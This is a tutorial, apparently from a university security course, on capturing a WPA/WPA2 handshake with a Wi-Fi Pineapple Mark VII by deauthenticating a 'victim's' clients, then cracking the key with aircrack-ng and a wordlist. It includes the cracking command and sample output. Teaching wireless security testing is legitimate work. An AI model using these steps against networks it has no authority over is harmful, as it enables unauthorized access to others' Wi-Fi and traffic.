WiFI Pineapple Mark VII: Cracking WPA/WPA2-PSK with a dictionary/brut force attack
Summary
This Documentation will give you a guide how to retrieve a WPA2-PSK password with the Wi-Fi Pineapple Mark VII combined with the Linux Tool aircrack-ng. The Wi-Fi Pineapple Mark VII will be used to deauthenticate the clients of the victim's Wi-Fi. Simultaneously, the Wi-Fi Pineapple Mark VII will capture the 4-way handshake between client and access point and saves it as a PCAP or Hashcat file. This guide will use Linux to demonstrate how to use aircrack-ng.
Requirements
Mandatory
GNU/Linux
- Install aircrack-ng suite:
sudo apt install aircrack-ng
To complete these steps, you must have followed WiFI Pineapple Mark VII: Initial Setup before.
Optional
Hashcat
- Clone GIT repository:
git clone https://github.com/hashcat/hashcat.git - Build:
cd ./hashcat && make && make install - Link:
sudo ln -s ./hashcat /usr/local/bin/hashcat
Description
Step 1
This step will describe you how to capture the handshake by deauthenticating the clients from its access point
- Log in to Wi-Fi Pineapple Web GUI and open the tab Reacon
- As seen in figure "WiFI Pineapple GUI", scan your environment for the victim's Wi-Fi (1).
- Choose the victim's Wi-Fi and select "Capture WPA Handshake"(4)
- Start deauthentication attack (3)
- When a handshake has been captured, it can be then downloaded
Step 2
The purpose of this step is to actually crack the WPA/WPA2 pre-shared key. To accomplish this, you need a dictionary of words as input. Basically, aircrack-ng takes each word and tests to see if this is, in fact, the pre-shared key.
Open a console session in Linux and enter:
aircrack-ng -w rockyou.txt -b 00:14:6C:7E:40:80 *.cap
Where:
-w rockyou.txt[1] is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory. Notice: any word list can be use for this attack. If the password you are looking for does not appear in the list, then the attack has failed.
.cap is the file containing the captured packets of the handshake.
Here is typical output when there are no handshakes found:
Opening psk-04.cap
Read 1827 packets.
No valid WPA handshakes found.
When this happens, you either have to redo step 3 (deauthenticating the wireless client) or wait longer if you are using the passive approach. When using the passive approach, you have to wait until a wireless client authenticates to the AP.
Here is typical output when handshakes are found:
Opening psk-04.cap
Read 1827 packets.
# BSSID ESSID Encryption
1 00:14:6C:7E:40:80 teddy WPA (1 handshake)
Choosing first network as target.
Now, at this point, aircrack-ng will start attempting to crack the pre-shared key. Depending on the speed of your CPU and the size of the dictionary, this could take a long time, even days.
Here is what successfully cracking the pre-shared key looks like:
Aircrack-ng 0.8
[00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
Used Hardware
Courses
- Campus Cyber Security Team WiFi Hacking 28.01.2022